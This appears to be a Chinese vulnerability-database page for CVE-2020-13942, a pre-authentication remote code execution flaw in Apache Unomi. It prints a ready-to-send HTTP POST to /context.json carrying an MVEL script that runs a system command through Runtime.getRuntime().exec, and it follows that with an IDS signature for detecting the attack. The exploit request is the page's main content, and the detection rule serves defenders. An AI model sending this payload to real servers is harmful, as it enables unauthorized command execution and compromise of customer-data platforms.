关联漏洞
标题:
Apache Unomi 注入漏洞
(CVE-2020-13942)
描述:Apache Unomi是美国阿帕奇软件(Apache Software)基金会的一套开源的客户数据平台。该平台主要使用Java语言编写。 Apache Unomi 1.5.2之前版本存在注入漏洞,该漏洞源于可以将恶意的OGNL或MVEL脚本注入/context.json公共端点。
介绍
# CVE-2020-13942 Apache Unomi pre-auth RCE
***CVE-2020-13942 exploit***
POST /context.json HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json
Content-Length: 200
{"filters":[{"id" : "test","filters": [{"condition": {"parameterValues": {"test": "script::Runtime.getRuntime().exec('whoami')"},"type":"profilePropertyCondition"}}]}],"sessionId": "test"}
***CVE-2020-13942 Detection rules***
alert http any any -> any any (msg:"ET EXPLOIT CVE-2020-13942 Apache Unomi pre-auth RCE"; flow:established,to_server; content:"POST"; http_method; content:"/context.json"; http_uri; content:"Runtime.getRuntime()"; http_client_body; nocase; content:".exec("; http_client_body; nocase; reference:url,twitter.com/chybeta/status/1328912309440311297; reference:cve,2020-13942; classtype:attempted-admin; sid:2031120; rev:2; metadata:affected_product Web_Server_Applications, attack_target Client_Endpoint, created_at 2020_11_18, former_category EXPLOIT, signature_severity Major, updated_at 2020_11_18;)
文件快照
[4.0K] /data/pocs/e077f0f8356b270d53e40aea61e8546c25edf227
└── [1.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。